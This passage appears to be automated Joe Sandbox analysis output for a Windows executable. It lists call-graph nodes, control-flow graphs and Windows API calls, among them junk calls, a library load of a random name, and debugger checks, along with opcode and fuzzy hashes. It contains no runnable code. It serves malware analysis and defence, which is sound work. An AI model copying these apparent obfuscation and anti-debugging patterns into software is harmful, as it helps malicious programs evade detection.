calls 4920->4921 4922 406ac0 4921->4922 4923 403235 __fcloseall 67 API calls 4922->4923 4924 406ac8 4923->4924 4925 403235 __fcloseall 67 API calls 4924->4925 4926 406ad0 4925->4926 4927 403235 __fcloseall 67 API calls 4926->4927 4928 406ad8 4927->4928 4929 403235 __fcloseall 67 API calls 4928->4929 4930 406ae0 4929->4930 4931 403235 __fcloseall 67 API calls 4930->4931 4932 406ae8 4931->4932 4933 403235 __fcloseall 67 API calls 4932->4933 4934 406af0 4933->4934 4935 403235 __fcloseall 67 API calls 4934->4935 4936 406af8 4935->4936 4937 403235 __fcloseall 67 API calls 4936->4937 4938 406b00 4937->4938 4939 403235 __fcloseall 67 API calls 4938->4939 4940 406b0e 4939->4940 4941 403235 __fcloseall 67 API calls 4940->4941 4942 406b19 4941->4942 4943 403235 __fcloseall 67 API calls 4942->4943 4944 406b24 4943->4944 4945 403235 __fcloseall 67 API calls 4944->4945 4946 406b2f 4945->4946 4947 403235 __fcloseall 67 API calls 4946->4947 4948 406b3a 4947->4948 4949 403235 __fcloseall 67 API calls 4948->4949 4950 406b45 4949->4950 4951 403235 __fcloseall 67 API calls 4950->4951 4952 406b50 4951->4952 4953 403235 __fcloseall 67 API calls 4952->4953 4954 406b5b 4953->4954 4955 403235 __fcloseall 67 API calls 4954->4955 4956 406b66 4955->4956 4957 403235 __fcloseall 67 API calls 4956->4957 4958 406b71 4957->4958 4959 403235 __fcloseall 67 API calls 4958->4959 4959->4874 4960->4803 4964 401bdd LeaveCriticalSection 4961->4964 4963 405486 4963->4782 4964->4963 4966 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 4965->4966 4967 405c0f 4966->4967 4968 4069ab 4967->4968 4969 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 4968->4969 4970 4069be 4969->4970 4973 4067f1 4970->4973 4974 406812 GetStringTypeW 4973->4974 4975 40683d 4973->4975 4976 406832 GetLastError 4974->4976 4977 40682a 4974->4977 4975->4977 4978 406924 4975->4978 4976->4975 4979 406876 MultiByteToWideChar 4977->4979 4990 40691e 4977->4990 5001 406dfc GetLocaleInfoA 4978->5001 4983 4068a3 4979->4983 4979->4990 4981 401000 __putwch_nolock 5 API calls 4984 4069a9 4981->4984 4986 40109e _malloc 67 API calls 4983->4986 4995 4068b8 _memset __alloca_probe_16 4983->4995 4984->4756 4985 406975 GetStringTypeA 4989 406990 4985->4989 4985->4990 4986->4995 4988 4068f1 MultiByteToWideChar 4992 406907 GetStringTypeW 4988->4992 4993 406918 4988->4993 4994 403235 __fcloseall 67 API calls 4989->4994 4990->4981 4992->4993 4997 406141 4993->4997 4994->4990 4995->4988 4995->4990 4998 40615e 4997->4998 4999 40614d 4997->4999 4998->4990 4999->4998 5000 403235 __fcloseall 67 API calls 4999->5000 5000->4998 5002 406e2a 5001->5002 5003 406e2f 5001->5003 5005 401000 __putwch_nolock 5 API calls 5002->5005 5004 401168 ___ansicp 90 API calls 5003->5004 5004->5002 5006 406948 5005->5006 5006->4985 5006->4990 5007 406e45 5006->5007 5008 406f0f 5007->5008 5009 406e85 GetCPInfo 5007->5009 5012 401000 __putwch_nolock 5 API calls 5008->5012 5010 406efa MultiByteToWideChar 5009->5010 5011 406e9c 5009->5011 5010->5008 5016 406eb5 _strlen 5010->5016 5011->5010 5013 406ea2 GetCPInfo 5011->5013 5014 406969 5012->5014 5013->5010 5015 406eaf 5013->5015 5014->4985 5014->4990 5015->5010 5015->5016 5017 40109e _malloc 67 API calls 5016->5017 5020 406ee7 _memset __alloca_probe_16 5016->5020 5017->5020 5018 406f44 MultiByteToWideChar 5019 406f5c 5018->5019 5029 406f7b 5018->5029 5021 406f80 5019->5021 5022 406f63 WideCharToMultiByte 5019->5022 5020->5008 5020->5018 5024 406f8b WideCharToMultiByte 5021->5024 5025 406f9f 5021->5025 5022->5029 5023 406141 __crtGetStringTypeA_stat 67 API calls 5023->5008 5024->5025 5024->5029 5026 40488f __calloc_crt 67 API calls 5025->5026 5027 406fa7 5026->5027 5028 406fb0 WideCharToMultiByte 5027->5028 5027->5029 5028->5029 5030 406fc2 5028->5030 5029->5023 5031 403235 __fcloseall 67 API calls 5030->5031 5031->5029 5033 407230 __initptd 5032->5033 5034 401cb7 __lock 67 API calls 5033->5034 5040 40723f 5034->5040 5035 4072d7 5050 4072f5 5035->5050 5038 4072e3 __initptd 5038->4709 5040->5035 5041 4071dc 105 API calls __fflush_nolock 5040->5041 5042 407d3b 5040->5042 5047 4072c6 5040->5047 5041->5040 5043 407d48 5042->5043 5044 407d5e EnterCriticalSection 5042->5044 5045 401cb7 __lock 67 API calls 5043->5045 5044->5040 5046 407d51 5045->5046 5046->5040 5053 407da9 5047->5053 5049 4072d4 5049->5040 5059 401bdd LeaveCriticalSection 5050->5059 5052 4072fc 5052->5038 5054 407db9 5053->5054 5055 407dcc LeaveCriticalSection 5053->5055 5058 401bdd LeaveCriticalSection 5054->5058 5055->5049 5057 407dc9 5057->5049 5058->5057 5059->5052 5061 416d81 FatalAppExitA GetModuleHandleW 5060->5061 5062 416d93 5060->5062 5061->5062 5062->4718 5062->4719 5064 416dc3 BuildCommDCBA 5063->5064 5067 416dcf 5063->5067 5064->5067 5065 416dfb 5065->4722 5065->4723 5067->5065 5068 416da0 5067->5068 5071 416d20 5068->5071 5072 416d4b 5071->5072 5073 416d3c SetPriorityClass 5071->5073 5072->5067 5073->5072 5075 401524 __initptd 5074->5075 5076 401cb7 __lock 67 API calls 5075->5076 5077 40152b 5076->5077 5080 40333e __decode_pointer 6 API calls 5077->5080 5084 4015e4 __initterm 5077->5084 5081 401562 5080->5081 5081->5084 5086 40333e __decode_pointer 6 API calls 5081->5086 5082 40162c __initptd 5082->4148 5091 40162f 5084->5091 5085 401623 5087 401428 _fast_error_exit 3 API calls 5085->5087 5090 401577 5086->5090 5087->5082 5088 40333e 6 API calls __decode_pointer 5088->5090 5089 403335 6 API calls _raise 5089->5090 5090->5084 5090->5088 5090->5089 5092 401635 5091->5092 5094 401610 5091->5094 5096 401bdd LeaveCriticalSection 5092->5096 5094->5082 5095 401bdd LeaveCriticalSection 5094->5095 5095->5085 5096->5094 5115 416dd7 5116 416de0 5115->5116 5117 416da0 SetPriorityClass 5116->5117 5118 416dfb 5116->5118 5117->5116 5463 403a77 5464 40488f __calloc_crt 67 API calls 5463->5464 5465 403a83 5464->5465 5466 4032c3 __encode_pointer 6 API calls 5465->5466 5467 403a8b 5466->5467 5652 408339 5653 408352 5652->5653 5654 40834a 5652->5654 5656 408364 5653->5656 5657 408361 CloseHandle 5653->5657 5654->5653 5655 40834f CloseHandle 5654->5655 5655->5653 5657->5656 5119 407cda 5120 4072fe ___endstdio 105 API calls 5119->5120 5121 407cdf 5120->5121 5122 407ced 5121->5122 5126 40827b 5121->5126 5124 403235 __fcloseall 67 API calls 5122->5124 5125 407cf8 5124->5125 5127 408287 __initptd 5126->5127 5128 401cb7 __lock 67 API calls 5127->5128 5131 408293 5128->5131 5129 4082fc 5149 408311 5129->5149 5131->5129 5133 4082d1 DeleteCriticalSection 5131->5133 5136 4083dd 5131->5136 5132 408308 __initptd 5132->5122 5135 403235 __fcloseall 67 API calls 5133->5135 5135->5131 5137 4083e9 __initptd 5136->5137 5138 40841a 5137->5138 5139 4083fd 5137->5139 5146 408412 __initptd 5138->5146 5152 407cfa 5138->5152 5140 4019d4 __set_error_mode 67 API calls 5139->5140 5142 408402 5140->5142 5144 403997 __set_error_mode 6 API calls 5142->5144 5144->5146 5146->5131 5396 401bdd LeaveCriticalSection 5149->5396 5151 408318 5151->5132 5153 407d0c 5152->5153 5154 407d2e EnterCriticalSection 5152->5154 5153->5154 5155 407d14 5153->5155 5157 407d24 5154->5157 5156 401cb7 __lock 67 API calls 5155->5156 5156->5157 5158 408366 5157->5158 5159 408396 5158->5159 5160 40837a 5158->5160 5163 40838f 5159->5163 5177 407174 5159->5177 5161 4019d4 __set_error_mode 67 API calls 5160->5161 5162 40837f 5161->5162 5165 403997 __set_error_mode 6 API calls 5162->5165 5174 408451 5163->5174 5165->5163 5172 4083b6 5172->5163 5173 403235 __fcloseall 67 API calls 5172->5173 5173->5163 5389 407d6d 5174->5389 5176 408457 5176->5146 5178 40718d 5177->5178 5182 4071af 5177->5182 5179 407b16 __fileno 67 API calls 5178->5179 5178->5182 5180 4071a8 5179->5180 5216 407a3a 5180->5216 5183 4085c2 5182->5183 5184 4083aa 5183->5184 5185 4085d2 5183->5185 5187 407b16 5184->5187 5185->5184 5186 403235 __fcloseall 67 API calls 5185->5186 5186->5184 5188 407b3a 5187->5188 5189 407b25 5187->5189 5193 4084f5 5188->5193 5190 4019d4 __set_error_mode 67 API calls 5189->5190 5191 407b2a 5190->5191 5192 403997 __set_error_mode 6 API calls 5191->5192 5192->5188 5194 408501 __initptd 5193->5194 5195 408524 5194->5195 5196 408509 5194->5196 5197 408532 5195->5197 5203 408573 5195->5203 5198 4019e7 __locking 67 API calls 5196->5198 5199 4019e7 __locking 67 API calls 5197->5199 5200 40850e 5198->5200 5202 408537 5199->5202 5201 4019d4 __set_error_mode 67 API calls 5200->5201 5214 408516 __initptd 5201->5214 5204 4019d4 __set_error_mode 67 API calls 5202->5204 5205 4081b4 ___lock_fhandle 68 API calls 5203->5205 5206 40853e 5204->5206 5207 408579 5205->5207 5210 403997 __set_error_mode 6 API calls 5206->5210 5208 408594 5207->5208 5209 408586 5207->5209 5212 4019d4 __set_error_mode 67 API calls 5208->5212 5361 408459 5209->5361 5210->5214 5213 40858e 5212->5213 5376 4085b8 5213->5376 5214->5172 5217 407a46 __initptd 5216->5217 5218 407a69 5217->5218 5219 407a4e 5217->5219 5220 407a77 5218->5220 5225 407ab8 5218->5225 5241 4019e7 5219->5241 5222 4019e7 __locking 67 API calls 5220->5222 5224 407a7c 5222->5224 5227 4019d4 __set_error_mode 67 API calls 5224->5227 5244 4081b4 5225->5244 5226 4019d4 __set_error_mode 67 API calls 5229 407a5b __initptd 5226->5229 5230 407a83 5227->5230 5229->5182 5232 403997 __set_error_mode 6 API calls 5230->5232 5231 407abe 5233 407ae1 5231->5233 5234 407acb 5231->5234 5232->5229 5235 4019d4 __set_error_mode 67 API calls 5233->5235 5254 407307 5234->5254 5237 407ae6 5235->5237 5239 4019e7 __locking 67 API calls 5237->5239 5238 407ad9 5313 407b0c 5238->5313 5239->5238 5242 403511 __getptd_noexit 67 API calls 5241->5242 5243 4019ec 5242->5243 5243->5226 5245 4081c0 __initptd 5244->5245 5246 40821b 5245->5246 5247 401cb7 __lock 67 API calls 5245->5247 5248 408220 EnterCriticalSection 5246->5248 5249 40823d __initptd 5246->5249 5250 4081ec 5247->5250 5248->5249 5249->5231 5251 408203 5250->5251 5252 4040a7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 5250->5252 5316 40824b 5251->5316 5252->5251 5255 407316 __write_nolock 5254->5255 5256 407348 5255->5256 5257 40736f 5255->5257 5286 40733d 5255->5286 5259 4019e7 __locking 67 API calls 5256->5259 5260 4073d7 5257->5260 5261 4073b1 5257->5261 5258 401000 __putwch_nolock 5 API calls 5262 407a38 5258->5262 5263 40734d 5259->5263 5265 4073eb 5260->5265 5320 408032 5260->5320 5264 4019e7 __locking 67 API calls 5261->5264 5262->5238 5266 4019d4 __set_error_mode 67 API calls 5263->5266 5268 4073b6 5264->5268 5330 407fce 5265->5330 5270 407354 5266->5270 5273 4019d4 __set_error_mode 67 API calls 5268->5273 5271 403997 __set_error_mode 6 API calls 5270->5271 5271->5286 5272 4073f6 5274 40769c 5272->5274 5279 40358a __getptd 67 API calls 5272->5279 5275 4073bf 5273->5275 5277 40796b WriteFile 5274->5277 5278 4076ac 5274->5278 5276 403997 __set_error_mode 6 API calls 5275->5276 5276->5286 5282 40799e GetLastError 5277->5282 5304 40767e 5277->5304 5280 40778a 5278->5280 5288 4076c0 5278->5288 5281 407411 GetConsoleMode 5279->5281 5291 40786a 5280->5291 5303 407799 5280->5303 5281->5274 5284 40743c 5281->5284 5282->5304 5283 4079e9 5283->5286 5289 4019d4 __set_error_mode 67 API calls 5283->5289 5284->5274 5285 40744e GetConsoleCP 5284->5285 5285->5304 5310 407471 5285->5310 5286->5258 5287 4079bc 5292 4079c7 5287->5292 5293 4079db 5287->5293 5288->5283 5294 40772e WriteFile 5288->5294 5288->5304 5295 407a0c 5289->5295 5290 4078d0 WideCharToMultiByte 5290->5282 5298 407907 WriteFile 5290->5298 5291->5283 5291->5290 5291->5298 5291->5304 5297 4019d4 __set_error_mode 67 API calls 5292->5297 5342 4019fa 5293->5342 5294->5282 5294->5288 5296 4019e7 __locking 67 API calls 5295->5296 5296->5286 5302 4079cc 5297->5302 5298->5291 5301 40793e GetLastError 5298->5301 5299 40780e WriteFile 5299->5282 5299->5303 5301->5291 5305 4019e7 __locking 67 API calls 5302->5305 5303->5283 5303->5299 5303->5304 5304->5283 5304->5286 5304->5287 5305->5286 5307 407fb4 79 API calls __fassign 5307->5310 5308 40751d WideCharToMultiByte 5308->5304 5309 40754e WriteFile 5308->5309 5309->5282 5309->5310 5310->5282 5310->5304 5310->5307 5310->5308 5311 407dd8 11 API calls __putwch_nolock 5310->5311 5312 4075a2 WriteFile 5310->5312 5339 406db8 5310->5339 5311->5310 5312->5282 5312->5310 5360 408254 LeaveCriticalSection 5313->5360 5315 407b14 5315->5229 5319 401bdd LeaveCriticalSection 5316->5319 5318 408252 5318->5246 5319->5318 5347 40813d 5320->5347 5322 408050 5323 408058 5322->5323 5324 408069 SetFilePointer 5322->5324 5325 4019d4 __set_error_mode 67 API calls 5323->5325 5326 408081 GetLastError 5324->5326 5327 40805d 5324->5327 5325->5327 5326->5327 5328 40808b 5326->5328 5327->5265 5329 4019fa __dosmaperr 67 API calls 5328->5329 5329->5327 5331 407fea 5330->5331 5332 407fdb 5330->5332 5335 4019d4 __set_error_mode 67 API calls 5331->5335 5337 40800e 5331->5337 5333 4019d4 __set_error_mode 67 API calls 5332->5333 5334 407fe0 5333->5334 5334->5272 5336 407ffe 5335->5336 5338 403997 __set_error_mode 6 API calls 5336->5338 5337->5272 5338->5337 5340 406d80 __isleadbyte_l 77 API calls 5339->5340 5341 406dc7 5340->5341 5341->5310 5343 4019e7 __locking 67 API calls 5342->5343 5344 401a05 __dosmaperr 5343->5344 5345 4019d4 __set_error_mode 67 API calls 5344->5345 5346 401a18 5345->5346 5346->5286 5348 408162 5347->5348 5349 40814a 5347->5349 5351 4019e7 __locking 67 API calls 5348->5351 5356 4081a7 5348->5356 5350 4019e7 __locking 67 API calls 5349->5350 5352 40814f 5350->5352 5353 408190 5351->5353 5354 4019d4 __set_error_mode 67 API calls 5352->5354 5355 4019d4 __set_error_mode 67 API calls 5353->5355 5357 408157 5354->5357 5358 408197 5355->5358 5356->5322 5357->5322 5359 403997 __set_error_mode 6 API calls 5358->5359 5359->5356 5360->5315 5362 40813d __commit 67 API calls 5361->5362 5363 408469 5362->5363 5364 4084bf 5363->5364 5366 40849d 5363->5366 5367 40813d __commit 67 API calls 5363->5367 5379 4080b7 5364->5379 5366->5364 5368 40813d __commit 67 API calls 5366->5368 5370 408494 5367->5370 5371 4084a9 CloseHandle 5368->5371 5373 40813d __commit 67 API calls 5370->5373 5371->5364 5374 4084b5 GetLastError 5371->5374 5372 4084e9 5372->5213 5373->5366 5374->5364 5375 4019fa __dosmaperr 67 API calls 5375->5372 5388 408254 LeaveCriticalSection 5376->5388 5378 4085c0 5378->5214 5380 408123 5379->5380 5381 4080c8 5379->5381 5382 4019d4 __set_error_mode 67 API calls 5380->5382 5381->5380 5386 4080f3 5381->5386 5383 408128 5382->5383 5384 4019e7 __locking 67 API calls 5383->5384 5385 408119 5384->5385 5385->5372 5385->5375 5386->5385 5387 408113 SetStdHandle 5386->5387 5387->5385 5388->5378 5390 407d9d LeaveCriticalSection 5389->5390 5391 407d7e 5389->5391 5390->5176 5391->5390 5392 407d85 5391->5392 5395 401bdd LeaveCriticalSection 5392->5395 5394 407d9a 5394->5176 5395->5394 5396->5151 5397 4040df 5398 4040eb SetLastError 5397->5398 5399 4040f3 __initptd 5397->5399 5398->5399

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2477803136-0
                                                                                                                                              • Opcode ID: 0b3215090b5a139c10ed41b0ee74db8f531c051cf043a2e305257fb1d2e2915d
                                                                                                                                              • Instruction ID: 6fdcb214c9b2331671cb2b23f299cc0ec8d03c5248dcf150cf5efc5892775ec8
                                                                                                                                              • Opcode Fuzzy Hash: 0b3215090b5a139c10ed41b0ee74db8f531c051cf043a2e305257fb1d2e2915d
                                                                                                                                              • Instruction Fuzzy Hash: 262190B0D003059AEB147BB3A886BAE3264AF0074CF14443FF545BB5E2EABC8981975C

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 62 40299c-4029be HeapCreate 63 4029c0-4029c1 62->63 64 4029c2-4029cb 62->64
                                                                                                                                              APIs
                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004029B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                              • Opcode ID: 25d361b09e957743b43b72790dab211c9d62290dab0b0874eedda8804c941646
                                                                                                                                              • Instruction ID: 3a72839581f0c50a84aadab3f374704c1ec627b182d416cdb63d0e5fb33497ee
                                                                                                                                              • Opcode Fuzzy Hash: 25d361b09e957743b43b72790dab211c9d62290dab0b0874eedda8804c941646
                                                                                                                                              • Instruction Fuzzy Hash: 94D05EB2A943095ADB005F757C097A63BEC9388395F10C43ABD0CC61D0F674D540DA08

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 65 416ec0-416ee8 call 407000 68 416ef0-416ef7 65->68 69 416f24-416f2a 68->69 70 416ef9-416f22 GetVolumeInformationA 68->70 71 416f2c-416f38 69->71 72 416f3e-416f48 69->72 70->69 71->72 73 416f83-416f8a 72->73 74 416f4a-416f79 WriteConsoleOutputAttribute 72->74 73->68 75 416f90-416f96 73->75 74->73 76 416f98-416f9e 75->76 77 416fa0-416fa6 76->77 78 416fac-416fb3 76->78 77->78 79 416fb5-416fb7 DeleteVolumeMountPointW 78->79 80 416fb9-416fc0 78->80 79->80 80->76 81 416fc2-416fc9 80->81 82 4170df-4170ed 81->82 83 416fcf-4170b2 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode call 4047d0 GetDefaultCommConfigA CopyFileA CreatePipe GetEnvironmentStringsW ReadConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 81->83 84 4170f0-4170fe SetCommState GetLastError 82->84 91 4170c0-4170c7 83->91 92 4170b4-4170ba ObjectPrivilegeAuditAlarmA 83->92 86 417100-417107 84->86 87 417109-417110 84->87 86->84 86->87 89 4171c2-4171d1 call 416ba0 87->89 90 417116-4171bd GetConsoleAliasesLengthW GetComputerNameW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryTypeA FormatMessageA GetLongPathNameW GetCommTimeouts call 40100f call 401189 call 40109e call 40100f call 4072fe call 40100f call 40109e call 401644 87->90 101 4171d3-4171e4 89->101 102 41720d-41722e LoadLibraryW call 416bd0 call 416e20 89->102 90->89 93 4170d0-4170dc call 401168 call 40117e 91->93 94 4170c9-4170ca ReleaseMutex 91->94 92->91 93->82 94->93 106 4171f0-417200 101->106 118 417230-417237 102->118 110 417202 106->110 111 417208-41720b 106->111 110->111 111->102 111->106 120 417239-417247 LocalAlloc GetStdHandle MoveFileA 118->120 121 41724d-417253 118->121 120->121 123 417255 call 416bc0 121->123 124 41725a-417261 121->124 123->124 127 417270-417277 124->127 128 417263-41726a InterlockedDecrement 124->128 127->118 130 417279-417289 127->130 128->127 132 417290-4172a0 130->132 133 4172a2-4172a7 GetFileAttributesW 132->133 134 4172a9-4172ac 132->134 133->134 134->132 136 4172ae-4172b9 134->136 138 4172c0-4172c5 136->138 139 4172c7-4172cd 138->139 140 4172cf-4172d5 138->140 139->140 141 4172d7-4172e4 call 401000 139->141 140->138 140->141
                                                                                                                                              APIs
                                                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00416F22
                                                                                                                                              • WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 00416F6D
                                                                                                                                              • DeleteVolumeMountPointW.KERNEL32(00000000), ref: 00416FB7
                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416FDA
                                                                                                                                              • GetFocus.USER32 ref: 00416FE0
                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00416FED
                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 00416FF4
                                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00416FFC
                                                                                                                                              • _memset.LIBCMT ref: 00417012
                                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00417023
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041702C
                                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00417042
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00417048
                                                                                                                                              • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041708D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041709C
                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004170A5
                                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004170BA
                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004170CA
                                                                                                                                              • SetCommState.KERNEL32(00000000,00000000), ref: 004170F4
                                                                                                                                              • GetLastError.KERNEL32 ref: 004170F6
                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417125
                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00417139
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00417140
                                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00417146
                                                                                                                                              • GetBinaryTypeA.KERNEL32(sutelizunosisibure,?), ref: 00417158
                                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041716B
                                                                                                                                              • GetLongPathNameW.KERNEL32(tekeragej,?,00000000), ref: 0041717E
                                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00417186
                                                                                                                                              • _calloc.LIBCMT ref: 0041718E
                                                                                                                                              • _realloc.LIBCMT ref: 00417195
                                                                                                                                              • _malloc.LIBCMT ref: 0041719B
                                                                                                                                              • _calloc.LIBCMT ref: 004171A2
                                                                                                                                              • _calloc.LIBCMT ref: 004171AE
                                                                                                                                              • _malloc.LIBCMT ref: 004171B4
                                                                                                                                              • LoadLibraryW.KERNEL32(gavosebisiv), ref: 00417212
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Console$CommFileName_calloc$LengthOutputReadVolume_malloc$AdjustmentAlarmAliasAliasesAtomAttributeAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultDeleteEnvironmentErrorExchangeExesFindFocusFormatInformationInterlockedLastLibraryLoadLongMessageModeModuleMountMutexObjectPathPipePointPrivilegeReleaseStateStringsSystemTimeTimeoutsTypeWrite_memset_realloc
                                                                                                                                              • String ID: gavosebisiv$k`$sutelizunosisibure$tekeragej$wumefalijocenor$}$
                                                                                                                                              • API String ID: 2926064888-770840792
                                                                                                                                              • Opcode ID: 616efd3cad4b6969d08ec2e2054b1f30d9626ef2968c098a09980378875153e8
                                                                                                                                              • Instruction ID: bd4547cb626b20a29bef7dd1c272b8299b50ccc80d2d00de4cf5370715da157f
                                                                                                                                              • Opcode Fuzzy Hash: 616efd3cad4b6969d08ec2e2054b1f30d9626ef2968c098a09980378875153e8
                                                                                                                                              • Instruction Fuzzy Hash: 06A1C171801128ABC724DB61EC45BDF7B78EF5D314F0181AEF609A3160DB385A89CBAD

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00401947
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040195C
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00418210), ref: 00401967
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00401983
                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0040198A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                              • Opcode ID: cab977522a7cec1a9ad2ed6b08adc5fb97aced058459959993d08fc7a1069c4d
                                                                                                                                              • Instruction ID: 67dfbe7b305ea0036175b21bacd2baea1b229a86cd233420b047d7cbc26f8ff8
                                                                                                                                              • Opcode Fuzzy Hash: cab977522a7cec1a9ad2ed6b08adc5fb97aced058459959993d08fc7a1069c4d
                                                                                                                                              • Instruction Fuzzy Hash: 3121A8B4980306DFC701EF68ECC4A843BE0FB08356F10C17AE528932A1E7B45A858F9D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
